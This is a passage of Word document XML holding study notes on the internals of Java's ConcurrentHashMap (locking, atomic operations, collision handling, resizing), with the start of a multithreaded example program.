          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Read operations (like get()) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock-free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means they do not require any synchronization, allowing multiple threads to read concurrently without contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D122708" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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Hashing Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7033ED" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ConcurrentHashMap uses the hash code of the key to determine which bucket it should be placed in, just like a HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6784D2A7" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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hashCode() of the key is calculated, and the result determines the bucket in which the entry will be stored. If two keys have the same hash code, they will be placed in the same bucket (this is called a hash collision).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D923C6A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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uckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In older versions, each segment was made up of an array of buckets. In the current version, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the map are divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smaller sub-segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be locked independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E248FFE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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Concurrency at the Segment Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4C2E2" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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e older versions of ConcurrentHashMap, the map was divided into segments (typically 16 segments). Each segment had its own lock, and threads could safely access and modify keys in different segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A56078" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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urrent version</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Instead of segments, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and their corresponding locks are designed to scale better, reducing contention further. When an entry is inserted or modified in the map, only the corresponding bucket is locked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372CBE9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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Atomic Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26058E33"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oncurrentHashMap provides a number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atomic operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for thread-safe updates and retrievals, which means you can safely perform operations like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D0B3A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tIfAbsent(K key, V value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds a key-value pair only if the key is not already present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61147B99" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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move(Object key, Object value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes a key-value pair only if the key is mapped to the specified value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D67A04" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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place(K key, V oldValue, V newValue)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces the value associated with the key only if it matches the old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413D8B2"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se operations allow atomic updates and can be used in multi-threaded environments without the need for manual synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D1E6C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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No Locking on Reads (Lock-Free Reads):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34F571" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ne of the key advantages of ConcurrentHashMap is that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read operations are lock-free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8D295" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations can be executed by multiple threads without needing to acquire a lock. This is achieved using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking algorithms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CAS (Compare and Swap)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which reduces the contention among threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473727F"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ince </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations typically outnumber </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations in most applications, lock-free reads significantly improve performance in highly concurrent environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC6034" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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7. Handling Hash Collisions (Internal Structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03A493" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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 Collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When two keys have the same hash code, they will be placed in the same bucket. In a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the bucket is implemented as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked lis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binary tree</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lock-free bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> depending on the size and number of collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CD74A4" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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 List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the bucket contains multiple entries with the same hash code, it will typically use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F009E3A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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inary Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If there are many hash collisions (more than 8 entries in a bucket), the ConcurrentHashMap can switch from a linked list to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>red-black tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a type of balanced tree) for faster lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3116E" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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ck-free Buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In newer versions, the map also uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock-free buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that operations on these buckets don’t require locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17807431" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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8. Structural Changes and Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F63D5D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the map exceeds a certain size (or load factor), it needs to be resized, which involves rehashing the keys. In earlier versions, the entire map was rehashed when the threshold was reached. However, with fine-grained locking and buckets, resizing in the current version happens without locking the entire map, improving performance during resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CF027" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ulk Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ConcurrentHashMap also supports some bulk operations, such as forEach(), reduce(), and search(), which operate atomically on the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5DA11" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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9. Performance and Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B861B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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igh Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since ConcurrentHashMap uses fine-grained locking and lock-free reads, it provides high concurrency and scales well with the number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4A209" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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calable Writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (like put(), remove()) are thread-safe and have lower contention due to fine-grained locking mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71590038" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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7E6A5316"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concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50025ED0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FC3A17"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ConcurrentHashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D46BE"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throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FBE52"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ncurrentHashMap&lt;String, Integer&gt; map = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1654F45B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542F131C"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e a thread that adds entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD0106"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read writerThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D1395"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or (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384EAC8"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key" + i, i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FE894"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1FA469E"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973CE81" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC5D9B2"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e a thread that reads entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D494B"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read readerThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131B4F6"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or (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF81EBB"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map.get("key" + i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBFABDA"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3307B59"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5F8E52B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="387C6250"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tart the threads</w:t>
      </w:r>
    </w:p>
